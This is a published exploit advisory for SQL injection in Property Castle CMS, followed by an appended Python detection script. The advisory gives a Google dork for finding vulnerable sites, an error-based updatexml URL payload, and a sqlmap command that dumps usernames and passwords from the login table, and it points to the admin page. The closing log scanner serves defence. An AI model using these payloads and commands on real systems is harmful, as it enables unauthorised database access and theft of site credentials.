Property Castle CMS post SQL injection

2015.10.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Property Castle CMS post SQL injection
# Google Dork: inurl:"/cms/cms.php?link_id="
# Date: 05/10/2015
# Exploit Author: Timoumi Houcem
# Tested on: kali linux on iceweasel browser

# EXPLOIT

1- get database name:
http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+
we will have database name

2- we search "contact us" page

3- we use "http header" to get data names (all post data are injectable, i will use the first in this example)

4- we use sqlmap tool now and inject it with POST method

EXAMPLE :
[ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ]

#admin page: http://website/admin/index.php
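A log-side check for the request in step 1, as an added example that is not part of the original advisory: it URL-decodes each query parameter, unwraps MySQL versioned comments such as `/*!50000concat*/`, and flags `updatexml`/`extractvalue` calls or a non-numeric `link_id`. The log lines, the `/cms/cms.php` path (taken from the dork) and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL executes the body of /*!NNNNN ... */ comments, so unwrap before matching.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# XML functions whose error text leaks query results (error-based extraction).
ERROR_BASED = re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses, paths and sizes are illustrative.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Oct/2015:10:00:01 +0000] "GET /cms/cms.php?link_id=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Oct/2015:10:02:13 +0000] "GET /cms/cms.php?link_id=4%27+and+'
    'updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+ HTTP/1.1" 200 812',
    '203.0.113.9 - - [06/Oct/2015:10:02:40 +0000] "GET /cms/cms.php?link_id=4%27 HTTP/1.1" 200 640',
]

def normalize(value):
    """Unwrap versioned comments and collapse whitespace."""
    value = VERSIONED_COMMENT.sub(r" \1 ", value)
    return re.sub(r"\s+", " ", value).strip()

def inspect_request(line):
    """Return (parameter, reason) findings for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group(1)).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)  # parse_qsl has already decoded %27 and '+'
        if ERROR_BASED.search(value):
            findings.append((name, "error-based XML function"))
        elif name == "link_id" and not value.isdigit():
            findings.append((name, "non-numeric link_id"))
    return findings

def scan(lines):
    """Map 1-based line number -> findings for every line that triggers a rule."""
    return {n: f for n, line in enumerate(lines, 1) if (f := inspect_request(line))}

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```

The POST fields from step 4 do not appear in a standard access log, so the same normalize-and-match step would have to run where request bodies are visible, for example in a WAF or application middleware.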

